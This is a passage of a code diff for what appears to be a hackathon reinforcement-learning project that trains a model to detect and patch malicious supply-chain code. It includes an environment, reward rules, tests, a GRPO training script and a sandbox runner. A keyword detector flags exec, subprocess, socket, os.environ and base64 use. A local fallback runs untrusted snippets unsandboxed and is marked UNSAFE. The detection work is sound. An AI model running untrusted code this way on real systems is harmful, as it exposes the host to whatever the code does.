|
| 39 |
+
"static_flags": spaces.Box(low=0, high=1, shape=(5,), dtype=np.int32),
|
| 40 |
+
"risk_score": spaces.Box(low=0.0, high=1.0, shape=(1,), dtype=np.float32),
|
| 41 |
+
}
|
| 42 |
+
)
|
| 43 |
+
|
| 44 |
+
# Define Action Space
|
| 45 |
+
self.action_space = spaces.Discrete(5)
|
| 46 |
+
|
| 47 |
+
def _load_scenarios(self):
|
| 48 |
+
try:
|
| 49 |
+
with open(self.scenarios_path, "r") as f:
|
| 50 |
+
return json.load(f)
|
| 51 |
+
except Exception as e:
|
| 52 |
+
print(f"Warning: Could not load scenarios from {self.scenarios_path}: {e}")
|
| 53 |
+
return []
|
| 54 |
+
|
| 55 |
+
def _compute_static_flags(self, code_snippet: str):
|
| 56 |
+
flags = np.zeros(5, dtype=np.int32)
|
| 57 |
+
|
| 58 |
+
if "eval(" in code_snippet or "exec(" in code_snippet:
|
| 59 |
+
flags[0] = 1
|
| 60 |
+
if "subprocess" in code_snippet or "os.system" in code_snippet:
|
| 61 |
+
flags[1] = 1
|
| 62 |
+
if "socket" in code_snippet or "requests" in code_snippet:
|
| 63 |
+
flags[2] = 1
|
| 64 |
+
if "os.environ" in code_snippet:
|
| 65 |
+
flags[3] = 1
|
| 66 |
+
if "base64" in code_snippet or "zlib" in code_snippet:
|
| 67 |
+
flags[4] = 1
|
| 68 |
+
|
| 69 |
+
return flags
|
| 70 |
+
|
| 71 |
+
def _get_obs(self):
|
| 72 |
+
code = self.current_scenario["code_snippet"]
|
| 73 |
+
# truncate code to 5000 chars to fit text space
|
| 74 |
+
if len(code) > 5000:
|
| 75 |
+
code = code[:5000]
|
| 76 |
+
|
| 77 |
+
flags = self._compute_static_flags(code)
|
| 78 |
+
risk_score = np.array([np.sum(flags) / 5.0], dtype=np.float32)
|
| 79 |
+
|
| 80 |
+
return {
|
| 81 |
+
"code_snippet": code,
|
| 82 |
+
"static_flags": flags,
|
| 83 |
+
"risk_score": risk_score
|
| 84 |
+
}
|
| 85 |
+
|
| 86 |
+
def reset(self, seed=None, options=None):
|
| 87 |
+
super().reset(seed=seed)
|
| 88 |
+
|
| 89 |
+
if not self.scenarios:
|
| 90 |
+
# Fallback if no scenarios to prevent crash
|
| 91 |
+
self.current_scenario = {
|
| 92 |
+
"id": "fallback", "type": "functional", "label": "benign",
|
| 93 |
+
"code_snippet": "print('hello')", "patch": None
|
| 94 |
+
}
|
| 95 |
+
else:
|
| 96 |
+
# We can optionally pass a specific scenario via options
|
| 97 |
+
if options and "scenario" in options:
|
| 98 |
+
self.current_scenario = options["scenario"]
|
| 99 |
+
else:
|
| 100 |
+
self.current_scenario = random.choice(self.scenarios)
|
| 101 |
+
|
| 102 |
+
self.step_counter = 0
|
| 103 |
+
self.last_action = None
|
| 104 |
+
self.last_reward = 0
|
| 105 |
+
|
| 106 |
+
return self._get_obs(), {}
|
| 107 |
+
|
| 108 |
+
def step(self, action):
|
| 109 |
+
self.step_counter += 1
|
| 110 |
+
|
| 111 |
+
reward = 0
|
| 112 |
+
done = False
|
| 113 |
+
info = {}
|
| 114 |
+
|
| 115 |
+
self.last_action = action
|
| 116 |
+
|
| 117 |
+
if action == self.ACTION_ANALYZE:
|
| 118 |
+
# Small exploration reward for analyzing
|
| 119 |
+
reward = 0.05
|
| 120 |
+
info = {"analysis": "Static analysis reveals potential injection points if untrusted input is passed."}
|
| 121 |
+
|
| 122 |
+
elif action == self.ACTION_EXECUTE_SANDBOX:
|
| 123 |
+
# Execute code snippet
|
| 124 |
+
result = run_code(self.current_scenario["code_snippet"], timeout_sec=3, use_docker=self.use_docker)
|
| 125 |
+
info = {"telemetry": result}
|
| 126 |
+
# Shaped reward for gathering info
|
| 127 |
+
reward = 0.1
|
| 128 |
+
|
| 129 |
+
elif action == self.ACTION_BLOCK_PR:
|
| 130 |
+
if self.current_scenario["label"] == "malicious":
|
| 131 |
+
reward = 1.5 # Correctly blocked
|
| 132 |
+
else:
|
| 133 |
+
reward = -2.0 # False positive block
|
| 134 |
+
done = True
|
| 135 |
+
|
| 136 |
+
elif action == self.ACTION_SUBMIT_PATCH:
|
| 137 |
+
scenario_patch = self.current_scenario.get("patch")
|
| 138 |
+
if not scenario_patch:
|
| 139 |
+
if self.current_scenario["label"] == "benign":
|
| 140 |
+
# Benign code doesn't need a patch, but submitting one is a mistake
|
| 141 |
+
reward = -1.0
|
| 142 |
+
else:
|
| 143 |
+
# Should have a patch for malicious, but it's missing in scenario?
|
| 144 |
+
reward = -0.5
|
| 145 |
+
else:
|
| 146 |
+
success, msg, details = validate_patch(self.current_scenario, scenario_patch, use_docker=self.use_docker)
|
| 147 |
+
info = {"validation_success": success, "msg": msg, "details": details}
|
| 148 |
+
|
| 149 |
+
if success:
|
| 150 |
+
if self.current_scenario["label"] == "malicious":
|
| 151 |
+
reward = 4.0 # High reward for fixing vulnerability
|
| 152 |
+
else:
|
| 153 |
+
reward = -2.5 # High penalty for breaking benign code
|
| 154 |
+
else:
|
| 155 |
+
reward = -1.5 # Patch failed validation
|
| 156 |
+
done = True
|
| 157 |
+
|
| 158 |
+
elif action == self.ACTION_REQUEST_REVIEW:
|
| 159 |
+
if self.current_scenario["type"] == "false_positive":
|
| 160 |
+
reward = 0.5 # Good choice for ambiguous cases
|
| 161 |
+
else:
|
| 162 |
+
reward = 0.0
|
| 163 |
+
done = True
|
| 164 |
+
info = {"review_requested": True}
|
| 165 |
+
|
| 166 |
+
# Check max steps
|
| 167 |
+
if self.step_counter >= self.max_steps and not done:
|
| 168 |
+
reward -= 0.5 # Penalty for timeout
|
| 169 |
+
done = True
|
| 170 |
+
|
| 171 |
+
self.last_reward = reward
|
| 172 |
+
return self._get_obs(), reward, done, False, info
|
| 173 |
+
|
| 174 |
+
def render(self):
|
| 175 |
+
print(f"Step: {self.step_counter} | Action: {self.last_action} | Reward: {self.last_reward}")
|
sentinel_synth/tests/__init__.py
ADDED
|
File without changes
|
sentinel_synth/tests/test_validator.py
ADDED
|
@@ -0,0 +1,57 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import pytest
|
| 2 |
+
from sentinel_synth.validation.patch_validator import validate_patch
|
| 3 |
+
|
| 4 |
+
def test_syntax_error_detected():
|
| 5 |
+
scenario = {"type": "functional", "code_snippet": "print('hello')", "unit_test_code": None}
|
| 6 |
+
patch = "print('hello" # Missing closing quote
|
| 7 |
+
|
| 8 |
+
success, msg, details = validate_patch(scenario, patch, use_docker=False)
|
| 9 |
+
|
| 10 |
+
assert success is False
|
| 11 |
+
assert msg == "Syntax error"
|
| 12 |
+
assert "error" in details
|
| 13 |
+
|
| 14 |
+
def test_unit_test_pass():
|
| 15 |
+
scenario = {
|
| 16 |
+
"type": "functional",
|
| 17 |
+
"code_snippet": "def add(a, b): return a + b",
|
| 18 |
+
"unit_test_code": "import code\nassert code.add(1, 2) == 3\n"
|
| 19 |
+
}
|
| 20 |
+
patch = "def add(a, b):\n return a + b\n"
|
| 21 |
+
|
| 22 |
+
success, msg, details = validate_patch(scenario, patch, use_docker=False)
|
| 23 |
+
|
| 24 |
+
assert success is True
|
| 25 |
+
assert msg == "Patch is valid"
|
| 26 |
+
|
| 27 |
+
def test_unit_test_fail():
|
| 28 |
+
scenario = {
|
| 29 |
+
"type": "functional",
|
| 30 |
+
"code_snippet": "def add(a, b): return a + b",
|
| 31 |
+
"unit_test_code": "import code\nassert code.add(1, 2) == 3\n"
|
| 32 |
+
}
|
| 33 |
+
# Breaking the functionality in the patch
|
| 34 |
+
patch = "def add(a, b):\n return a - b\n"
|
| 35 |
+
|
| 36 |
+
success, msg, details = validate_patch(scenario, patch, use_docker=False)
|
| 37 |
+
|
| 38 |
+
assert success is False
|
| 39 |
+
assert msg == "Unit test failed"
|
| 40 |
+
assert "test_output" in details
|
| 41 |
+
|
| 42 |
+
def test_vulnerability_remains():
|
| 43 |
+
# Attack injects a hidden print which simulates a backdoor
|
| 44 |
+
scenario = {
|
| 45 |
+
"type": "true_positive",
|
| 46 |
+
"attack_type": "obfuscated_exec",
|
| 47 |
+
"code_snippet": "print('Hello from hidden exec!')\ndef add(a, b): return a + b",
|
| 48 |
+
"unit_test_code": "import code\nassert code.add(1, 2) == 3\n"
|
| 49 |
+
}
|
| 50 |
+
# Patch fails to remove the backdoor, only formats the code
|
| 51 |
+
patch = "print('Hello from hidden exec!')\ndef add(a, b):\n return a + b\n"
|
| 52 |
+
|
| 53 |
+
success, msg, details = validate_patch(scenario, patch, use_docker=False)
|
| 54 |
+
|
| 55 |
+
assert success is False
|
| 56 |
+
assert msg == "Vulnerability remains"
|
| 57 |
+
assert "evidence" in details
|
sentinel_synth/training/__init__.py
ADDED
|
File without changes
|
sentinel_synth/training/train_grpo.py
ADDED
|
@@ -0,0 +1,187 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import os
|
| 2 |
+
import argparse
|
| 3 |
+
import numpy as np
|
| 4 |
+
|
| 5 |
+
try:
|
| 6 |
+
import wandb
|
| 7 |
+
except ImportError:
|
| 8 |
+
wandb = None
|
| 9 |
+
|
| 10 |
+
# In a real environment, we would also import:
|
| 11 |
+
# from unsloth import FastLanguageModel
|
| 12 |
+
# from trl import GRPOTrainer, GRPOConfig
|
| 13 |
+
# But for the hackathon prototype and safe execution without massive deps,
|
| 14 |
+
# we use mock classes in dry-run mode if the real ones aren't available.
|
| 15 |
+
|
| 16 |
+
from ..envs.sentinel_env import SentinelEnv
|
| 17 |
+
|
| 18 |
+
def train_agent(args):
|
| 19 |
+
"""
|
| 20 |
+
Main training loop for Sentinel-Synth GRPO.
|
| 21 |
+
"""
|
| 22 |
+
# 1. Setup WandB
|
| 23 |
+
if not args.dry_run:
|
| 24 |
+
wandb.init(project="sentinel-synth", name="grpo-qwen2.5-coder-7b", config=vars(args))
|
| 25 |
+
else:
|
| 26 |
+
print("[DRY RUN] WandB initialization skipped.")
|
| 27 |
+
|
| 28 |
+
# 2. Load Environment
|
| 29 |
+
env = SentinelEnv(use_docker=args.use_docker)
|
| 30 |
+
print(f"Loaded environment with {len(env.scenarios)} scenarios.")
|
| 31 |
+
|
| 32 |
+
# 3. Load Model (Mock or unsloth)
|
| 33 |
+
if args.dry_run:
|
| 34 |
+
print("[DRY RUN] Loading dummy model instead of Qwen2.5-Coder-7B in 4-bit...")
|
| 35 |
+
def dummy_policy(obs):
|
| 36 |
+
# Deterministic dummy policy for dry runs
|
| 37 |
+
risk = obs["risk_score"][0]
|
| 38 |
+
if risk > 0.5:
|
| 39 |
+
return 3 # ACTION_SUBMIT_PATCH
|
| 40 |
+
return 0 # ACTION_ANALYZE
|
| 41 |
+
|
| 42 |
+
# 4. Dummy Training Loop
|
| 43 |
+
epochs = 3
|
| 44 |
+
batch_size = 4
|
| 45 |
+
|
| 46 |
+
for epoch in range(epochs):
|
| 47 |
+
print(f"--- Epoch {epoch+1}/{epochs} ---")
|
| 48 |
+
total_rewards = []
|
| 49 |
+
|
| 50 |
+
for batch_idx in range(len(env.scenarios) // batch_size):
|
| 51 |
+
trajectories = []
|
| 52 |
+
for g in range(args.group_size):
|
| 53 |
+
obs, _ = env.reset()
|
| 54 |
+
done = False
|
| 55 |
+
trajectory_reward = 0
|
| 56 |
+
steps = 0
|
| 57 |
+
|
| 58 |
+
while not done and steps < env.max_steps:
|
| 59 |
+
action = dummy_policy(obs)
|
| 60 |
+
obs, reward, done, _, info = env.step(action)
|
| 61 |
+
trajectory_reward += reward
|
| 62 |
+
steps += 1
|
| 63 |
+
|
| 64 |
+
trajectories.append(trajectory_reward)
|
| 65 |
+
|
| 66 |
+
# Mock GRPO Advantage calculation
|
| 67 |
+
mean_reward = np.mean(trajectories)
|
| 68 |
+
std_reward = np.std(trajectories) + 1e-8
|
| 69 |
+
advantages = [(r - mean_reward) / std_reward for r in trajectories]
|
| 70 |
+
|
| 71 |
+
total_rewards.append(mean_reward)
|
| 72 |
+
print(f"Batch {batch_idx}: Mean Reward: {mean_reward:.2f}, Advantages: {[f'{a:.2f}' for a in advantages]}")
|
| 73 |
+
|
| 74 |
+
print(f"Epoch {epoch+1} Mean Reward: {np.mean(total_rewards):.2f}")
|
| 75 |
+
if not args.dry_run:
|
| 76 |
+
wandb.log({"epoch": epoch+1, "mean_reward": np.mean(total_rewards)})
|
| 77 |
+
|
| 78 |
+
print("[DRY RUN] Training complete. Saved dummy adapter to ./grpo_lora/")
|
| 79 |
+
else:
|
| 80 |
+
print("Initializing true GRPO training with trl and unsloth...")
|
| 81 |
+
try:
|
| 82 |
+
from unsloth import FastLanguageModel
|
| 83 |
+
from unsloth import is_bfloat16_supported
|
| 84 |
+
from trl import GRPOTrainer, GRPOConfig
|
| 85 |
+
from datasets import Dataset
|
| 86 |
+
|
| 87 |
+
max_seq_length = args.max_seq_len
|
| 88 |
+
model, tokenizer = FastLanguageModel.from_pretrained(
|
| 89 |
+
model_name="unsloth/Qwen2.5-Coder-7B-Instruct",
|
| 90 |
+
max_seq_length=max_seq_length,
|
| 91 |
+
load_in_4bit=True,
|
| 92 |
+
)
|
| 93 |
+
|
| 94 |
+
model = FastLanguageModel.get_peft_model(
|
| 95 |
+
model,
|
| 96 |
+
r=16,
|
| 97 |
+
target_modules=["q_proj", "k_proj", "v_proj", "o_proj",
|
| 98 |
+
"gate_proj", "up_proj", "down_proj"],
|
| 99 |
+
lora_alpha=16,
|
| 100 |
+
lora_dropout=0,
|
| 101 |
+
bias="none",
|
| 102 |
+
use_gradient_checkpointing="unsloth",
|
| 103 |
+
random_state=3407,
|
| 104 |
+
)
|
| 105 |
+
|
| 106 |
+
# Formulate training as text completion where PPO builds on top.
|
| 107 |
+
# In GRPO, we can provide a reward function that evaluates completions.
|
| 108 |
+
|
| 109 |
+
import re
|
| 110 |
+
|
| 111 |
+
def env_reward_function(completions, prompts, **kwargs):
|
| 112 |
+
"""
|
| 113 |
+
Extracts chosen action, runs env, returns reward array.
|
| 114 |
+
Matches completions to their corresponding scenario from prompts.
|
| 115 |
+
"""
|
| 116 |
+
rewards = []
|
| 117 |
+
for prompt, completion in zip(prompts, completions):
|
| 118 |
+
# extract the action from the completion using regex
|
| 119 |
+
text = completion[0]["content"]
|
| 120 |
+
match = re.search(r"<action>(\d+)</action>", text)
|
| 121 |
+
if match:
|
| 122 |
+
try:
|
| 123 |
+
action = int(match.group(1))
|
| 124 |
+
except ValueError:
|
| 125 |
+
action = SentinelEnv.ACTION_ANALYZE
|
| 126 |
+
else:
|
| 127 |
+
action = SentinelEnv.ACTION_ANALYZE
|
| 128 |
+
|
| 129 |
+
# Find which scenario this prompt belongs to
|
| 130 |
+
# (In a real setup we'd pass IDs, here we search by substring)
|
| 131 |
+
target_scenario = None
|
| 132 |
+
for s in env.scenarios:
|
| 133 |
+
if s["code_snippet"][:100] in prompt:
|
| 134 |
+
target_scenario = s
|
| 135 |
+
break
|
| 136 |
+
|
| 137 |
+
if not target_scenario:
|
| 138 |
+
rewards.append(0.0)
|
| 139 |
+
continue
|
| 140 |
+
|
| 141 |
+
# Reset env with this specific scenario
|
| 142 |
+
obs, info = env.reset(options={"scenario": target_scenario})
|
| 143 |
+
_, reward, _, _, _ = env.step(action)
|
| 144 |
+
rewards.append(reward)
|
| 145 |
+
return rewards
|
| 146 |
+
|
| 147 |
+
# We need a proper dataset of prompts
|
| 148 |
+
prompt_data = [{"prompt": f"Analyze this Python code for supply-chain vulnerabilities.\n<code_snippet>\n{s['code_snippet']}\n</code_snippet>\nYour response MUST include a thought process in <thought> tags and a final action (0-4) in <action> tags.\n0: ANALYZE, 1: EXECUTE_SANDBOX, 2: BLOCK_PR, 3: SUBMIT_PATCH, 4: REQUEST_REVIEW."} for s in env.scenarios]
|
| 149 |
+
dataset = Dataset.from_list(prompt_data)
|
| 150 |
+
|
| 151 |
+
training_args = GRPOConfig(
|
| 152 |
+
output_dir="grpo_lora",
|
| 153 |
+
learning_rate=args.learning_rate,
|
| 154 |
+
per_device_train_batch_size=1,
|
| 155 |
+
gradient_accumulation_steps=args.gradient_accumulation_steps,
|
| 156 |
+
max_prompt_length=args.max_seq_len // 2,
|
| 157 |
+
max_completion_length=args.max_seq_len // 2,
|
| 158 |
+
num_generations=args.group_size,
|
| 159 |
+
max_steps=args.max_steps,
|
| 160 |
+
save_steps=50,
|
| 161 |
+
logging_steps=10,
|
| 162 |
+
report_to="wandb",
|
| 163 |
+
)
|
| 164 |
+
|
| 165 |
+
trainer = GRPOTrainer(
|
| 166 |
+
model=model,
|
| 167 |
+
reward_funcs=[env_reward_function],
|
| 168 |
+
args=training_args,
|
| 169 |
+
train_dataset=dataset,
|
| 170 |
+
)
|
| 171 |
+
|
| 172 |
+
trainer.train()
|
| 173 |
+
model.save_pretrained_merged("grpo_lora", tokenizer, save_method="lora")
|
| 174 |
+
print("Training complete and adapter saved.")
|
| 175 |
+
except ImportError as e:
|
| 176 |
+
print(f"Skipping standard training fallback. Missing required dependency: {e}")
|
| 177 |
+
|
| 178 |
+
if __name__ == "__main__":
|
| 179 |
+
parser = argparse.ArgumentParser()
|
| 180 |
+
parser.add_argument("--dry-run", action="store_true", help="Run with mock components without GPU.")
|
| 181 |
+
parser.add_argument("--use-docker", action="store_true", help="Use Docker for execution fallback in env.")
|
| 182 |
+
parser.add_argument("--learning-rate", type=float, default=1e-6)
|
| 183 |
+
parser.add_argument("--group-size", type=int, default=4)
|
| 184 |
+
parser.add_argument("--max-seq-len", type=int, default=1024)
|
| 185 |
+
|
| 186 |
+
args = parser.parse_args()
|
| 187 |
+
train_agent(args)
|
sentinel_synth/validation/__init__.py
ADDED
|
File without changes
|
sentinel_synth/validation/docker_runner.py
ADDED
|
@@ -0,0 +1,107 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import os
|
| 2 |
+
import tempfile
|
| 3 |
+
import subprocess
|
| 4 |
+
import shutil
|
| 5 |
+
|
| 6 |
+
# To support --no-docker or environments where docker isn't running yet.
|
| 7 |
+
def run_code(code: str, timeout_sec: int = 5, use_docker: bool = True) -> dict:
|
| 8 |
+
"""
|
| 9 |
+
Executes Python code in an isolated environment.
|
| 10 |
+
If use_docker is True, runs in `sentinel-sandbox:latest`.
|
| 11 |
+
If False, runs locally using subprocess (UNSAFE for real workloads, but fine for demo/dev).
|
| 12 |
+
"""
|
| 13 |
+
temp_dir = tempfile.mkdtemp(prefix="sentinel_sandbox_")
|
| 14 |
+
script_path = os.path.join(temp_dir, "script.py")
|
| 15 |
+
|
| 16 |
+
with open(script_path, "w") as f:
|
| 17 |
+
f.write(code)
|
| 18 |
+
|
| 19 |
+
result = {
|
| 20 |
+
"stdout": "",
|
| 21 |
+
"stderr": "",
|
| 22 |
+
"exit_code": -1,
|
| 23 |
+
"network_blocked": use_docker,
|
| 24 |
+
"file_writes": []
|
| 25 |
+
}
|
| 26 |
+
|
| 27 |
+
try:
|
| 28 |
+
if use_docker:
|
| 29 |
+
# We assume docker CLI is available.
|
| 30 |
+
# `docker run --rm --network none --memory 256m --cpus 0.5 -v temp_dir:/app sentinel-sandbox python /app/script.py`
|
| 31 |
+
cmd = [
|
| 32 |
+
"docker", "run", "--rm",
|
| 33 |
+
"--network", "none",
|
| 34 |
+
"--memory", "256m",
|
| 35 |
+
"--cpus", "0.5",
|
| 36 |
+
"-v", f"{temp_dir}:/app",
|
| 37 |
+
"sentinel-sandbox:latest",
|
| 38 |
+
"python", "/app/script.py"
|
| 39 |
+
]
|
| 40 |
+
else:
|
| 41 |
+
# Local fallback (UNSAFE but necessary if Docker is unavailable)
|
| 42 |
+
cmd = ["python3", script_path]
|
| 43 |
+
|
| 44 |
+
process = subprocess.run(
|
| 45 |
+
cmd,
|
| 46 |
+
capture_output=True,
|
| 47 |
+
text=True,
|
| 48 |
+
timeout=timeout_sec
|
| 49 |
+
)
|
| 50 |
+
|
| 51 |
+
result["stdout"] = process.stdout
|
| 52 |
+
result["stderr"] = process.stderr
|
| 53 |
+
result["exit_code"] = process.returncode
|
| 54 |
+
|
| 55 |
+
# Check if the code wrote any *new* files to the temp dir
|
| 56 |
+
for filename in os.listdir(temp_dir):
|
| 57 |
+
if filename != "script.py":
|
| 58 |
+
result["file_writes"].append(filename)
|
| 59 |
+
|
| 60 |
+
except subprocess.TimeoutExpired as e:
|
| 61 |
+
result["stderr"] = "Execution timed out."
|
| 62 |
+
if use_docker and hasattr(e, 'stdout') and e.stdout:
|
| 63 |
+
result["stdout"] = e.stdout.decode('utf-8', errors='ignore') if isinstance(e.stdout, bytes) else e.stdout
|
| 64 |
+
|
| 65 |
+
except Exception as e:
|
| 66 |
+
result["stderr"] = f"Execution error: {str(e)}"
|
| 67 |
+
|
| 68 |
+
finally:
|
| 69 |
+
shutil.rmtree(temp_dir, ignore_errors=True)
|
| 70 |
+
|
| 71 |
+
return result
|
| 72 |
+
|
| 73 |
+
def check_syntax(code: str, use_docker: bool = True) -> tuple[bool, str]:
|
| 74 |
+
"""Check python syntax of the code without fully executing it."""
|
| 75 |
+
temp_dir = tempfile.mkdtemp(prefix="sentinel_syntax_")
|
| 76 |
+
script_path = os.path.join(temp_dir, "script.py")
|
| 77 |
+
|
| 78 |
+
with open(script_path, "w") as f:
|
| 79 |
+
f.write(code)
|
| 80 |
+
|
| 81 |
+
try:
|
| 82 |
+
if use_docker:
|
| 83 |
+
cmd = [
|
| 84 |
+
"docker", "run", "--rm",
|
| 85 |
+
"-v", f"{temp_dir}:/app",
|
| 86 |
+
"sentinel-sandbox:latest",
|
| 87 |
+
"python", "-m", "py_compile", "/app/script.py"
|
| 88 |
+
]
|
| 89 |
+
else:
|
| 90 |
+
cmd = ["python3", "-m", "py_compile", script_path]
|
| 91 |
+
|
| 92 |
+
process = subprocess.run(
|
| 93 |
+
cmd,
|
| 94 |
+
capture_output=True,
|
| 95 |
+
text=True,
|
| 96 |
+
timeout=5
|
| 97 |
+
)
|
| 98 |
+
if process.returncode == 0:
|
| 99 |
+
return True, ""
|
| 100 |
+
else:
|
| 101 |
+
return False, process.stderr
|
| 102 |
+
except subprocess.TimeoutExpired:
|
| 103 |
+
return False, "Syntax check timed out"
|
| 104 |
+
except Exception as e:
|
| 105 |
+
return False, f"Syntax check failed: {e}"
|
| 106 |
+
finally:
|
| 107 |
+
shutil.rmtree(temp_dir, ignore_errors=True)
|
sentinel_synth/validation/patch_validator.py
ADDED
|
@@ -0,0 +1,87 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import os
|
| 2 |
+
import tempfile
|
| 3 |
+
import textwrap
|
| 4 |
+
from .docker_runner import run_code, check_syntax
|
| 5 |
+
|
| 6 |
+
def validate_patch(scenario: dict, patch_code: str, use_docker: bool = True) -> tuple[bool, str, dict]:
|
| 7 |
+
"""
|
| 8 |
+
Validates a patch using a 3-step pipeline:
|
| 9 |
+
1. Syntax Check
|
| 10 |
+
2. Unit Test Execution
|
| 11 |
+
3. Re-attack (Vulnerability Verification)
|
| 12 |
+
|
| 13 |
+
Returns: (success, message, details_dict)
|
| 14 |
+
"""
|
| 15 |
+
details = {}
|
| 16 |
+
|
| 17 |
+
# 1. Syntax Check
|
| 18 |
+
is_valid, err_msg = check_syntax(patch_code, use_docker=use_docker)
|
| 19 |
+
if not is_valid:
|
| 20 |
+
details["error"] = err_msg
|
| 21 |
+
return False, "Syntax error", details
|
| 22 |
+
|
| 23 |
+
# 2. Unit Test Execution
|
| 24 |
+
if scenario.get("unit_test_code"):
|
| 25 |
+
# We need to run the unit test code.
|
| 26 |
+
# test.py contains something like: "import code; assert code.func() == expected"
|
| 27 |
+
# We write patched code to a module 'code.py', and run 'test.py'
|
| 28 |
+
|
| 29 |
+
# We can construct a combined script that writes the 'code' module dynamically,
|
| 30 |
+
# or we just embed the patched code and the test code in one unified runner.
|
| 31 |
+
# Easiest way in a single file runner (since docker_runner runs a single script):
|
| 32 |
+
combined_script = f"""import sys
|
| 33 |
+
import types
|
| 34 |
+
|
| 35 |
+
# Create a mock 'code' module
|
| 36 |
+
module = types.ModuleType('code')
|
| 37 |
+
exec('''{patch_code}''', module.__dict__)
|
| 38 |
+
sys.modules['code'] = module
|
| 39 |
+
|
| 40 |
+
# Run the unit test
|
| 41 |
+
{scenario['unit_test_code']}
|
| 42 |
+
print("TEST_SUCCESS")
|
| 43 |
+
"""
|
| 44 |
+
|
| 45 |
+
result = run_code(combined_script, timeout_sec=5, use_docker=use_docker)
|
| 46 |
+
if result["exit_code"] != 0 or "TEST_SUCCESS" not in result["stdout"]:
|
| 47 |
+
details["test_output"] = result["stderr"] if result["stderr"] else result["stdout"]
|
| 48 |
+
return False, "Unit test failed", details
|
| 49 |
+
|
| 50 |
+
